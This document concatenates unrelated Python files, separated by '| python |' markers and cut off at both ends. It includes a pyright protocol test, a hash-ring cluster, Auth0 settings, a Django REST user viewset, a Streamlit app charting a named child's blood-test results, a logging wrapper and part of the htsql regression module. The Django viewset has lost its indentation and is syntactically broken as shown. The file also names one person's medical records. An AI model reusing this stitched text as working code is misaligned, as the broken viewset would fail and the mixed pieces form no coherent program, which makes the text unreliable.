    print("Test: {:.4f} ± {:.4f}".format(np.mean(test_accuracies),
                                         np.std(test_accuracies)))
    print("Train: {:.4f} ± {:.4f}".format(np.mean(train_accuracies),
                                          np.std(train_accuracies)))
    # BUGFIX: summarize the collected list, not the leftover scalar `loss`
    # from the last file (mean/std of a scalar is just that scalar).
    print("Loss: {:.4f} ± {:.4f}".format(np.mean(train_losses),
                                         np.std(train_losses)))


if __name__ == "__main__":
    main()
|
python
|
# This sample tests the case where a protocol class derives from
# another protocol class.
from typing import Generic, TypeVar, Protocol
Arg = TypeVar("Arg", contravariant=True)
Value = TypeVar("Value")
class Base1(Protocol[Value]):
    # Minimal protocol generic in Value.
    def method1(self, default: Value) -> Value:
        ...


class Base2(Base1[Value], Protocol):
    # A protocol deriving from another protocol; adds method2.
    def method2(self, default: Value) -> Value:
        ...


class Interface(Base2[Value], Protocol[Arg, Value]):
    # Widens the parameterization with the contravariant Arg.
    def another(self, arg: Arg) -> None:
        ...
class Implementation1(Generic[Arg, Value]):
    # Structurally satisfies Interface: all three methods, matching types.
    def method1(self, default: Value) -> Value:
        return default

    def method2(self, default: Value) -> Value:
        return default

    def another(self, arg: Arg) -> None:
        return


def func1(arg: Arg, value: Value) -> Interface[Arg, Value]:
    # OK: Implementation1 conforms to the protocol.
    return Implementation1[Arg, Value]()
class Implementation2(Generic[Arg, Value]):
    # Deliberately incomplete: method2 is missing (negative test fixture).
    def method1(self, default: Value) -> Value:
        return default

    def another(self, arg: Arg) -> None:
        return


def func2(arg: Arg, value: Value) -> Interface[Arg, Value]:
    # This should generate an error because
    # Implementation2 doesn't implement method2.
    return Implementation2[Arg, Value]()
class Implementation3(Generic[Arg, Value]):
    # Deliberately mismatched: method1 is typed int, not Value
    # (negative test fixture).
    def method1(self, default: int) -> int:
        return default

    def method2(self, default: Value) -> Value:
        return default

    def another(self, arg: Arg) -> None:
        return


def func3(arg: Arg, value: Value) -> Interface[Arg, Value]:
    # This should generate an error because
    # Implementation3's signature doesn't match.
    return Implementation3[Arg, Value]()
|
python
|
import collections
from supriya import CalculationRate
from supriya.synthdefs import WidthFirstUGen
class ClearBuf(WidthFirstUGen):
    """
    ::

        >>> clear_buf = supriya.ugens.ClearBuf.ir(
        ...     buffer_id=23,
        ...     )
        >>> clear_buf
        ClearBuf.ir()

    """

    ### CLASS VARIABLES ###

    __documentation_section__ = "Buffer UGens"

    # Single input: the id of the buffer to clear (no default value).
    _ordered_input_names = collections.OrderedDict([("buffer_id", None)])

    # Only the scalar (initialization) rate is valid for this UGen.
    _valid_calculation_rates = (CalculationRate.SCALAR,)
|
python
|
from collections import OrderedDict
from itertools import takewhile
from dht.utils import last
class Cluster(object):
    """A consistent-hash style ring of member nodes.

    A key is routed to the member with the greatest hash that is still
    <= the key's hash; keys hashing below every member "wrap around" to
    the last (highest-hashed) member.
    """

    def __init__(self, members, hash_fn=hash):
        # Generalized (backward compatible): the hash function is now
        # injectable; the default is the builtin hash, as before.
        self.hash = hash_fn
        # BUGFIX: location() assumes members are ordered by ascending
        # hash, but plain insertion order gave no such guarantee --
        # sort explicitly (by hash only; nodes need not be comparable).
        self.members = OrderedDict(
            sorted(((self.hash(node), node) for node in members),
                   key=lambda pair: pair[0]))

    def __len__(self):
        # Total number of keys stored across all member nodes.
        return sum(len(node) for node in self.members.values())

    def __getitem__(self, key):
        return self.location(key)[key]

    def __setitem__(self, key, value):
        self.location(key)[key] = value

    def __delitem__(self, key):
        del self.location(key)[key]

    def location(self, key):
        """
        Returns where a given key should be stored.
        """
        hashed = self.hash(key)
        target = None
        for node_hash, node in self.members.items():
            if node_hash > hashed:
                break
            target = node
        if target is None:
            # "wrap around" the ring of nodes to the last node if no node
            # has a hashed value lower than or equal to the key's hash.
            # BUGFIX: dict views are not subscriptable in Python 3, so
            # the old `self.members.values()[-1]` raised TypeError.
            target = next(reversed(self.members.values()))
        return target
|
python
|
from typing import Optional
from pydantic import BaseSettings, Json
from ._version import version as __version__ # NOQA
class Settings(BaseSettings):
    # Auth0 / API configuration. Values load from environment variables
    # using the "spi" prefix (see Config); auth_key has no default and
    # must be supplied as a JSON-encoded value.
    auth_token_url: str = "https://solarperformanceinsight.us.auth0.com/oauth/token"
    auth_jwk_url: str = (
        "https://solarperformanceinsight.us.auth0.com/.well-known/jwks.json"
    )
    auth_key: Json
    auth_audience: str = "https://app.solarperformanceinsight.org/api"
    auth_issuer: str = "https://solarperformanceinsight.us.auth0.com/"
    auth_client_id: str = "G1YyfLdseYn10RQo11Lqee2ThXj5l5fh"
    # Tracing sample rate; None disables performance tracing.
    traces_sample_rate: Optional[float] = None

    class Config:
        env_prefix = "spi"


# Singleton settings instance created at import time.
settings = Settings()
|
python
|
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.decorators import action
from backend.api.models import MiembroSprint, Usuario, Rol
from backend.api.serializers import UsuarioSerializer
class UsuarioViewSet(viewsets.ViewSet):
"""
UsuarioViewSet View para el modelo Usuario
Args:
viewsets (module): tipo de clase basado en view
"""
    @action(detail=False, methods=['GET'])
    def me(self, request):
        """Return the authenticated user.

        Args:
            request (Any): request
        """
        usuario_request = Usuario.objects.get(user=request.user)
        serializer = UsuarioSerializer(usuario_request, many=False)
        return Response(serializer.data)
def list(self, request):
"""
list Lista todos los usuarios del sistema
Args:
request (Any): request
Returns:
json: lista de usuarios en formato json
"""
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("ver_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["ver_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuarios = Usuario.objects.all()
serializer = UsuarioSerializer(usuarios, many=True)
return Response(serializer.data)
def retrieve(self, request, pk=None):
"""
retrieve Obtiene un usuario mediante su pk
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario obtenido en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("ver_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["ver_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def activar(self, request, pk=None):
"""
activar Activa el usuario con la pk especificada
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario activado en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("activar_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["activar_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
usuario.activar()
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def desactivar(self, request, pk=None):
"""
desactivar Desactiva el usuario con la pk especificada
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario desactivado en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("desactivar_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["desactivar_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
if usuario_request == usuario:
response = {"message": "No puedes desactivarte a ti mismo"}
return Response(response, status=status.HTTP_409_CONFLICT)
if MiembroSprint.pertenece_a_sprint_activo(usuario):
response = {
"message": "Este usuario pertenece a un Sprint Activo",
"error": "conflict"
}
return Response(response, status=status.HTTP_409_CONFLICT)
usuario.desactivar()
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def asignar_rol(self, request, pk=None):
"""
asignar_rol Asigna un rol a un usuario
Args:
request (Any): request
pk (int, opcional): primary key. Defaults to None.
Returns:
json: html response
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
usuario = Usuario.objects.get(pk=pk)
if not (usuario_request.tiene_permiso("ver_usuarios") and usuario_request.tiene_permiso("ver_roles")
and usuario_request.tiene_permiso("asignar_roles")):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": [
"ver_usuarios",
"ver_roles",
"asignar_roles"
]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
if usuario_request == usuario:
response = {"message": "No puede asignarse roles a sí mismo"}
return Response(response, status=status.HTTP_403_FORBIDDEN)
rol = Rol.objects.get(pk=request.data['id'])
usuario.asignar_rol(rol)
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
except Rol.DoesNotExist:
response = {"message": "No existe el rol"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
|
python
|
from thenewboston.accounts.manage import create_account
from thenewboston.verify_keys.verify_key import encode_verify_key
def random_encoded_account_number():
    """Create a fresh random account and return its encoded account number.

    The signing key generated alongside the account number is intentionally
    discarded — only the (public) account number is needed here.
    """
    _, account_number = create_account()
    return encode_verify_key(verify_key=account_number)
|
python
|
# -*- coding: utf-8 -*-
import streamlit as st
import numpy as np
import pandas as pd
import altair as alt
from io import BytesIO
def to_excel(df):
    """Serialize *df* to an in-memory .xlsx workbook and return its bytes.

    The whole sheet (columns A:Z) is formatted with two decimal places.
    """
    output = BytesIO()
    # BUG FIX: ExcelWriter.save() was deprecated and removed in pandas 2.0;
    # the context-manager form closes/saves the workbook on exit and also
    # releases it if an exception is raised mid-write.
    with pd.ExcelWriter(output, engine='xlsxwriter') as writer:
        df.to_excel(writer, index=True, sheet_name='杜子期血常规数据统计')
        workbook = writer.book
        worksheet = writer.sheets['杜子期血常规数据统计']
        format1 = workbook.add_format({'num_format': '0.00'})
        worksheet.set_column('A:Z', None, format1)
    return output.getvalue()
# Page-level configuration: use the full browser width for wide tables.
st.set_page_config(layout='wide')
# Raise pandas display limits so long cell contents are not truncated.
pd.set_option("display.max_colwidth", 1000, 'display.width', 1000)
def highlight_dataframe(s):
    """Styler callback: color measurements that fall outside their range.

    *s* interleaves values and reference ranges: even positions hold a
    measured value, the following odd position holds a "lo~hi" string.
    Returns one CSS string per element of *s*: 'color: orange' below the
    range, 'color: red' above it, '' otherwise (range cells are unstyled).
    """
    styles = []
    for i in range(0, len(s) - 1, 2):
        try:
            value = float(s[i])
            # Renamed from min/max: the original shadowed the builtins.
            lo, hi = s[i + 1].split('~')
            if value < float(lo):
                styles.append('color: orange')
            elif value > float(hi):
                styles.append('color: red')
            else:
                styles.append('')
        except Exception:
            # Missing value ('nan'), malformed range, etc. — leave unstyled.
            styles.append('')
        styles.append('')
    return styles
# Maps the item names used by different lab-report formats/analyzers to one
# canonical name, so the same measurement from different reports lands in a
# single row of the normalized table.
# NOTE(review): a few keys repeat with identical values (dict literals keep
# the last occurrence) — harmless, but they could be pruned.
items_map = {
    '白细胞计数(WBC)(10^9/L)': '白细胞计数(WBC)(10^9/L)',
    '淋巴细胞绝对值(LYM#)(10^9/L)': '淋巴细胞绝对值(LYM#)(10^9/L)',
    '中性粒细胞绝对值(NEU#)(10^9/L)': '中性粒细胞绝对值(NEU#)(10^9/L)',
    '单核细胞绝对值(MON#)(10^9/L)': '单核细胞绝对值(MON#)(10^9/L)',
    '嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)': '嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)',
    '嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)': '嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)',
    '红细胞体积分布宽度-CV(RDW-CV)(%)': '红细胞体积分布宽度-CV(RDW-CV)(%)',
    '红细胞体积分布宽度-SD(RDW-SD)(fL)': '红细胞体积分布宽度-SD(RDW-SD)(fL)',
    '血小板体积分布宽度(PDW)(%)': '血小板体积分布宽度(PDW)(%)',
    '血小板平均体积(MPV)(fL)': '血小板平均体积(MPV)(fL)',
    '血小板压积(PCT)(%)': '血小板压积(PCT)(%)',
    '嗜碱性粒细胞百分比(BAS%)(BAS%)(%)': '嗜碱性粒细胞百分比(BAS%)(BAS%)(%)',
    '嗜酸性粒细胞百分比(EO%)(EOS%)(%)': '嗜酸性粒细胞百分比(EO%)(EOS%)(%)',
    '红细胞计数(RBC)(10^12/L)': '红细胞计数(RBC)(10^12/L)',
    '血红蛋白浓度(HGB)(g/L)': '血红蛋白浓度(HGB)(g/L)',
    '红细胞压积(HCT)(%)': '红细胞压积(HCT)(%)',
    '平均红细胞体积(MCV)(fL)': '平均红细胞体积(MCV)(fL)',
    '平均红细胞血红蛋白含量(MCH)(MCH)(pg)': '平均红细胞血红蛋白含量(MCH)(MCH)(pg)',
    '平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)': '平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)',
    '血小板计数(PLT)(10^9/L)': '血小板计数(PLT)(10^9/L)',
    '淋巴细胞百分比(LYM%)(%)': '淋巴细胞百分比(LYM%)(%)',
    '中性粒细胞百分比(NEU%)(%)': '中性粒细胞百分比(NEU%)(%)',
    '单核细胞百分比(MON%)(%)': '单核细胞百分比(MON%)(%)',
    '大血小板比率(P-LC,R)': '大血小板比率(P-LC,R)',
    '嗜碱性粒细胞计数(BASO#)(10^9/L)': '嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)',
    '血小板平均体积(MPV)(fL)': '血小板平均体积(MPV)(fL)',
    '中性粒细胞计数(NEUT#)(10^9/L)': '中性粒细胞绝对值(NEU#)(10^9/L)',
    '中性粒细胞百分比(NEUT%)(%)': '中性粒细胞百分比(NEU%)(%)',
    '血小板压积(PCT)(%)': '血小板压积(PCT)(%)',
    '血小板分布宽度(PDW)(%)': '血小板体积分布宽度(PDW)(%)',
    '大血小板比率(P-LCR)': '大血小板比率(P-LC,R)',
    '血小板总数(PLT)(10^9/L)': '血小板计数(PLT)(10^9/L)',
    '红细胞计数(RBC)(10^12/L)': '红细胞计数(RBC)(10^12/L)',
    '红细胞分布宽度CV(RDW-CV)(%)': '红细胞体积分布宽度-CV(RDW-CV)(%)',
    '红细胞分布宽度-SD(RDW-SD)(fL)': '红细胞体积分布宽度-SD(RDW-SD)(fL)',
    '单核细胞百分比(MONO%)(%)': '单核细胞百分比(MON%)(%)',
    '单核细胞计数(MONO#)(10^9/L)': '单核细胞绝对值(MON#)(10^9/L)',
    '平均红细胞体积(MCV)(fL)': '平均红细胞体积(MCV)(fL)',
    '嗜碱性粒细胞百分比(BASO%)(%)': '嗜碱性粒细胞百分比(BAS%)(BAS%)(%)',
    #'C-反应蛋白(CRP)(mg/L)',
    '嗜酸性粒细胞计数(EO#)(10^9/L)': '嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)',
    '嗜酸性粒细胞百分比(EO%)(%)': '嗜酸性粒细胞百分比(EO%)(EOS%)(%)',
    '红细胞压积(HCT)(%)': '红细胞压积(HCT)(%)',
    '血红蛋白(HGB)(g/L)': '血红蛋白浓度(HGB)(g/L)',
    '淋巴细胞计数(LYMPH#)(10^9/L)': '淋巴细胞绝对值(LYM#)(10^9/L)',
    '淋巴细胞百分比(LYMPH%)(%)': '淋巴细胞百分比(LYM%)(%)',
    '平均血红蛋白含量(MCH)(pg)': '平均红细胞血红蛋白含量(MCH)(MCH)(pg)',
    '平均血红蛋白浓度(MCHC)(g/L)': '平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)',
    '白细胞数目(WBC)(10^9/L)': '白细胞计数(WBC)(10^9/L)'
}
# Normalize every report into a single table: rows are canonical item names
# (each value row followed by its "_参考范围" reference-range row), columns
# are the report dates.
items = set(items_map.values())
items_ref = [x + '_参考范围' for x in items]
df = pd.read_excel('杜子期血常规.xlsx', engine='openpyxl')
df_new = pd.DataFrame([], index=[rv for r in zip(items, items_ref) for rv in r])
# BUG FIX: DataFrame.iteritems() was removed in pandas 2.0; items() is the
# long-standing equivalent (iterates (column_label, Series) pairs).
for index, row in df.items():
    df_new[index] = ''
    for i, item in enumerate(row):
        if item in items_map:
            canonical = items_map[item]
            # Use .at instead of chained indexing (df_new[col][row] = ...):
            # chained assignment may write to a temporary copy and is
            # unreliable across pandas versions.
            try:
                df_new.at[canonical, index] = float(row[i + 1])
            except (TypeError, ValueError):
                # Non-numeric cell (e.g. missing measurement).
                df_new.at[canonical, index] = np.nan
            df_new.at[canonical + '_参考范围', index] = row[i + 2]
df_new.columns = np.array([x.date() for x in df_new.columns])
st.title('杜子期血常规数据统计')
df_new_str = df_new.astype(str)
st.write(df_new_str.style.apply(highlight_dataframe, axis=0))
st.download_button("Export to Excel", data=to_excel(df_new), file_name='杜子期血常规数据统计.xlsx')
# --- Sidebar: pick which measurements to plot ---------------------------
chart_items = set()
#other = st.sidebar.expander('其他选项')
#if other.checkbox('显示原始数据'):
#    st.write(df)
#st.sidebar.write('')
st.sidebar.write('请选择画图项')
if st.sidebar.checkbox('所有项'):
    chart_items = set(items)
for item in items:
    if st.sidebar.checkbox(item):
        chart_items.add(item)
# Plot the selected rows over time; fall back to the platelet count when
# nothing is selected.
if chart_items:
    df = df_new.loc[chart_items, :].T
    #df.index = df.index.to_numpy(dtype='datetime64')
    st.line_chart(df)
else:
    df = df_new.loc['血小板计数(PLT)(10^9/L)', :].T
    st.line_chart(df_new.loc['血小板计数(PLT)(10^9/L)'].T)
#df = df_new.loc['血小板计数(PLT)(10^9/L)'].T
# Vega-Lite line chart of the platelet count with point markers + tooltips.
df = df_new.T
df['date'] = df.index
st.vega_lite_chart(data=df, spec={
    'mark': {
        'type': 'line',
        'point': True,
        'tooltip': True
    },
    'encoding': {
        'x': {
            "type": "temporal",
            #'timeUnit': 'date',
            'field': 'date',
        },
        'y': {
            "type": "quantitative",
            'field': '血小板计数(PLT)(10^9/L)'
            #'field': list(chart_items)
        }
    }
}, use_container_width=True)
# --- Correlation matrix of the measured values --------------------------
st.write('相关系数矩阵')
# Keep only the value rows (drop the "_参考范围" reference-range rows).
df = df_new.filter(regex='^((?!_参考范围$).)*$', axis=0).astype(float)
st.write(df.T.corr())
# Long-form (variable, variable2, correlation) table for Altair.
cor_data = df.T.corr().stack().reset_index().rename(columns={0: 'correlation', 'level_0': 'variable', 'level_1': 'variable2'})
cor_data['correlation_label'] = cor_data['correlation'].map('{:.2f}'.format)
base = alt.Chart(cor_data).encode(
    x='variable2:O',
    y='variable:O'
)
# Text layer with correlation labels
# Colors are for easier readability
text = base.mark_text().encode(
    text='correlation_label',
    color=alt.condition(
        alt.datum.correlation > 0.5,
        alt.value('white'),
        alt.value('black')
    )
)
# The correlation heatmap itself
cor_plot = base.mark_rect().encode(
    color='correlation:Q'
)
st.altair_chart(cor_plot + text, use_container_width=True)
|
python
|
import asyncio
import logging
import logging.handlers
import time
from contextlib import suppress
from typing import Optional, Union
from ..thread_pool import run_in_new_thread
def _thread_flusher(
handler: logging.handlers.MemoryHandler,
flush_interval: Union[float, int],
loop: asyncio.AbstractEventLoop,
) -> None:
def has_no_target() -> bool:
return True
def has_target() -> bool:
return bool(handler.target) # type: ignore
is_target = has_no_target
if isinstance(handler, logging.handlers.MemoryHandler):
is_target = has_target
while not loop.is_closed() and is_target():
with suppress(Exception):
if handler.buffer:
handler.flush()
time.sleep(flush_interval)
def wrap_logging_handler(
    handler: logging.Handler,
    loop: Optional[asyncio.AbstractEventLoop] = None,
    buffer_size: int = 1024,
    flush_interval: Union[float, int] = 0.1,
) -> logging.Handler:
    """Wrap *handler* in a MemoryHandler flushed by a background thread.

    Records are buffered (up to *buffer_size*, CRITICAL records flush
    immediately) and drained every *flush_interval* seconds for as long
    as *loop* (or the current event loop) stays open.  Returns the
    buffering handler to install in place of *handler*.
    """
    event_loop = loop or asyncio.get_event_loop()
    memory_handler = logging.handlers.MemoryHandler(
        buffer_size,
        target=handler,
        flushLevel=logging.CRITICAL,
    )
    run_in_new_thread(
        _thread_flusher,
        args=(memory_handler, flush_interval, event_loop),
        no_return=True,
    )
    return memory_handler
|
python
|
#
# Copyright (c) 2006-2013, Prometheus Research, LLC
#
"""
:mod:`htsql.ctl.regress`
========================
This module implements the `regress` routine.
"""
from .error import ScriptError
from .routine import Argument, Routine
from .option import (InputOption, TrainOption, PurgeOption,
ForceOption, QuietOption)
from .request import Request
from ..core.validator import (Validator, BoolVal, StrVal, WordVal,
ChoiceVal, IntVal, UFloatVal, DBVal, SeqVal,
MapVal, ClassVal, AnyVal)
from ..core.util import maybe, trim_doc, DB
import traceback
import io
import sys
import os, os.path
import shutil
import re
import difflib
import tempfile
import subprocess
import atexit
import time
import yaml, yaml.constructor
# Indicates that a field has no default value and therefore cannot be omitted.
MANDATORY_FIELD = object()
# Return values for `ask_*` methods indicating the user-chosen action.
# Each is a unique sentinel; compare with `is`, never `==`.
DO_CONTINUE = object()
DO_DISCARD = object()
DO_HALT = object()
DO_RECORD = object()
DO_SAVE = object()
DO_SKIP = object()
class TermStringIO(io.StringIO):
    """
    A readable file-like object with an "echo": every piece of content
    read from it is also written to the given `output` stream.

    Useful for replaying interactive sessions from pre-recorded input:
    point `sys.stdin` at a :class:`TermStringIO` echoing into
    `sys.stdout`, and the transcript looks as if it were typed on a real
    terminal with echo enabled.

    `buf` (a string)
        The content of the stream.

    `output` (a writable file-like object)
        A stream that records data being read.
    """

    def __init__(self, buf, output):
        super().__init__(buf)
        self.output = output

    def read(self, n=-1):
        chunk = super().read(n)
        self.output.write(chunk)
        return chunk

    def readline(self, length=None):
        chunk = super().readline(length)
        self.output.write(chunk)
        return chunk
class Field(object):
    """
    Describes a parameter of test data.

    `attribute` (a string)
        The name of the attribute that contains the field value.

    `val` (:class:`htsql.validator.Validator`)
        The validator for the field values.

    `default`
        The default value of the field.  If not provided, the field
        cannot be omitted; the `is_mandatory` attribute indicates
        whether a `default` value was given.

    `hint` (a string or ``None``)
        A short one-line description of the field.
    """

    # Distinguishes regular fields from `AnyField` placeholders.
    is_any = False

    def __init__(self, attribute, val,
                 default=MANDATORY_FIELD, hint=None):
        # Sanity check on the arguments.
        assert isinstance(attribute, str)
        assert re.match(r'^[a-zA-Z_][0-9a-zA-Z_]*$', attribute)
        assert isinstance(val, Validator)
        assert isinstance(hint, maybe(str))
        self.attribute = attribute
        self.val = val
        self.default = default
        self.is_mandatory = (default is MANDATORY_FIELD)
        self.hint = hint

    def get_hint(self):
        """
        Returns short one-line description of the field.
        """
        return self.hint

    def get_signature(self):
        """
        Returns the field name; mandatory fields are marked with ``*``.
        """
        signature = self.attribute.replace('_', '-')
        return signature + '*' if self.is_mandatory else signature
class AnyField(object):
    """
    Indicates that test data may contain extra fields.

    Append ``AnyField()`` to a `fields` list to declare that the YAML
    representation of the test data may carry attributes not described
    by the other fields; such extras are silently ignored.
    """

    # Marker consulted when filtering out `AnyField` instances.
    is_any = True
class TestData(object):
    """
    Represents input or output data of a test case.

    This is an abstract class.  Create a subclass of :class:`TestData`
    to describe input or output data for a specific test kind.  You need
    to specify the format of test data using the `fields` class attribute:
    a list of :class:`Field` instances, each describing one attribute.

    Instances of :class:`TestData` are YAML-serializable; an instance is
    represented as a mapping YAML node whose keys/values come from the
    `fields` list.  Add an :class:`AnyField` instance to `fields` to allow
    (and ignore) extra mapping keys.

    The constructor accepts:

    `routine` (:class:`RegressRoutine`)
        The routine that started the testing.

    `case_class` (a subclass of :class:`TestCase`)
        A test type.  The object being constructed is an instance
        of either `case_class.Input` or `case_class.Output`.

    `attributes` (a dictionary)
        A dictionary of attributes and their values; the attribute set
        is declared by the `fields` class variable.

    `location` (a string or ``None``)
        When the test data is loaded from a YAML file, `location`
        indicates the location of the corresponding YAML node.
    """

    fields = []

    def __init__(self, routine, case_class, attributes, location=None):
        # Sanity check on the arguments.
        assert isinstance(routine, RegressRoutine)
        assert issubclass(case_class, TestCase)
        assert self.__class__ in [case_class.Input, case_class.Output]
        assert isinstance(attributes, dict)
        assert isinstance(location, maybe(str))
        self.routine = routine
        self.case_class = case_class
        for name in attributes:
            setattr(self, name, attributes[name])
        self.location = location
        self.init_attributes()

    def init_attributes(self):
        """
        Normalize field values.
        """
        # Override in a subclass if you need to massage some field values.

    def __str__(self):
        # Produces the value of the first mandatory field.
        title_attribute = None
        for field in self.fields:
            if field.is_any:
                continue
            if field.is_mandatory:
                title_attribute = field.attribute
                # BUG FIX: without this break the loop continued and ended
                # up with the *last* mandatory field, contradicting the
                # stated intent (only harmless when there is exactly one).
                break
        if title_attribute is None:
            return ''
        return repr(getattr(self, title_attribute))

    def __repr__(self):
        return "<%s.%s %s>" % (self.case_class.__name__,
                               self.__class__.__name__, self)
class TestCase(object):
    """
    Describes a test type.

    This is an abstract class.  Create a subclass of :class:`TestCase`
    to describe a new type of test case.  When subclassing, define
    the following class attributes:

    `name` (a string)
        The name of the test.

    `hint` (a string)
        Short one-line description of the test.

    `help` (a string)
        Long description of the test.

    `Input` (a subclass of :class:`TestData`)
        The format of the test input.

    `Output` (a subclass of :class:`TestData` or ``None``)
        The format of the test output.

    You also need to override methods :meth:`verify` and :meth:`train`
    to specify how to execute the test case in a normal and in a train mode.

    The constructor of :class:`TestCase` takes the following arguments:

    `routine` (:class:`RegressRoutine`)
        The routine that started the testing.

    `state`
        An object keeping the mutable testing state.

    `input` (an instance of `Input`)
        Input test data.

    `output` (an instance of `Output` or ``None``)
        Expected output test data.
    """

    name = None
    hint = None
    help = None

    # Override to declare the format of input and output test data.
    Input = None
    Output = None

    @classmethod
    def get_hint(cls):
        """
        Returns short one-line description of the test case.
        """
        return cls.hint

    @classmethod
    def get_help(cls):
        """
        Returns long description of the test case.
        """
        # Produce:
        #   {help}
        #
        #   Input data:
        #     {field.signature} - {field.hint}
        #     ...
        #
        #   Output data:
        #     {field.signature} - {field.hint}
        #     ...
        lines = []
        help = trim_doc(cls.help)
        if help is not None:
            lines.append(help)
        for data_class in [cls.Input, cls.Output]:
            if data_class is None:
                continue
            if lines:
                lines.append("")
            lines.append("%s data:" % data_class.__name__)
            # `AnyField` placeholders carry no name/hint, so skip them.
            for field in data_class.fields:
                if field.is_any:
                    continue
                signature = field.get_signature()
                hint = field.get_hint()
                if hint is not None:
                    lines.append("  %-24s : %s" % (signature, hint))
                else:
                    lines.append("  %s" % signature)
        return "\n".join(lines)

    def __init__(self, routine, state, input, output):
        # Sanity check on the arguments.
        assert isinstance(routine, RegressRoutine)
        assert isinstance(state, routine.state_class)
        if self.Input is None:
            assert input is None
        else:
            assert isinstance(input, self.Input)
        if self.Output is None:
            assert output is None
        else:
            assert isinstance(output, maybe(self.Output))
        self.routine = routine
        self.state = state
        self.input = input
        self.output = output
        # When the test case is in the quiet mode (indicated by `is_quiet`),
        # all output is redirected to `quiet_buffer`.  If for some reason
        # the test case leaves the quiet mode, all the accumulated data
        # is dumped to the standard output stream.
        self.is_quiet = routine.quiet
        self.quiet_buffer = io.StringIO()

    def make_output(self, **attributes):
        # Generate a new test output record with the given attributes.
        return self.Output(self.routine, self.__class__, attributes)

    @classmethod
    def matches(cls, input, output):
        """
        Checks if the given input and output records belong to the same
        test case.

        Note that we assume that both test input and test output have
        a field with the same attribute name.  This attribute is called
        the key attribute.  Input data matches output data when the
        values of their key attribute are equal.
        """
        # Sanity check on the arguments.
        assert isinstance(input, maybe(TestData))
        assert isinstance(output, maybe(TestData))
        # `input` and `output` must be instances of `Input` and `Output`
        # classes of the test case.
        if cls.Input is None or cls.Output is None:
            return False
        if not isinstance(input, cls.Input):
            return False
        if not isinstance(output, cls.Output):
            return False
        # Find the key attribute: one that is declared both as an input field
        # and as an output field.
        key_attribute = None
        input_attributes = [field.attribute for field in cls.Input.fields
                            if not field.is_any]
        output_attributes = [field.attribute for field in cls.Output.fields
                             if not field.is_any]
        for attribute in input_attributes:
            if attribute in output_attributes:
                key_attribute = attribute
                break
        if key_attribute is None:
            return False
        # `input` and `output` are matched when the values of their key
        # attributes are equal.
        if getattr(input, key_attribute) != getattr(output, key_attribute):
            return False
        return True

    def get_suites(self):
        """
        For container test cases, returns a set of test suites that belong
        to the test case; otherwise returns an empty set.
        """
        return set()

    def out(self, *values, **options):
        """
        Print values to the standard output stream.

        :meth:`out` supports the same options as
        :meth:`htsql.ctl.script.Script.out` and an extra option:

        `indent`
            A number of spaces to print before the first value,
            default is ``0``.
        """
        indent = options.pop('indent', 0)
        if indent:
            # `print`-style separators add one space back, hence `indent-1`.
            values = (' '*(indent-1),) + values
        # If the test case is in the quiet mode, redirect the output
        # to `quiet_buffer`.
        if self.is_quiet and 'file' not in options:
            options['file'] = self.quiet_buffer
        self.routine.ctl.out(*values, **options)

    def ask(self, message, choices):
        """
        Asks the user a question; returns the reply.

        `message` (a string)
            The question.

        `choices` (a list of strings)
            The list of valid replies.

        Typically the question has the form::

            Press ENTER to perform <the default action>,
            'x'+ENTER to perform <another action>,
            'y'+ENTER to perform <another action>,
            'z'+ENTER to perform <another action>.

        In this case, `choices` should be equal to::

            ['', 'x', 'y', 'z']

        The reply is stripped of leading and trailing whitespaces
        and translated to the lower case.
        """
        # Leave the quiet mode and print the question.
        self.force_out()
        self.out()
        self.out(">>>", message)
        line = None
        # Repeat till we get a valid answer.
        while line not in choices:
            self.out("> ", end='')
            line = self.routine.ctl.stdin.readline().strip().lower()
        return line

    def ask_halt(self):
        """
        Ask if the user wants to halt the tests.
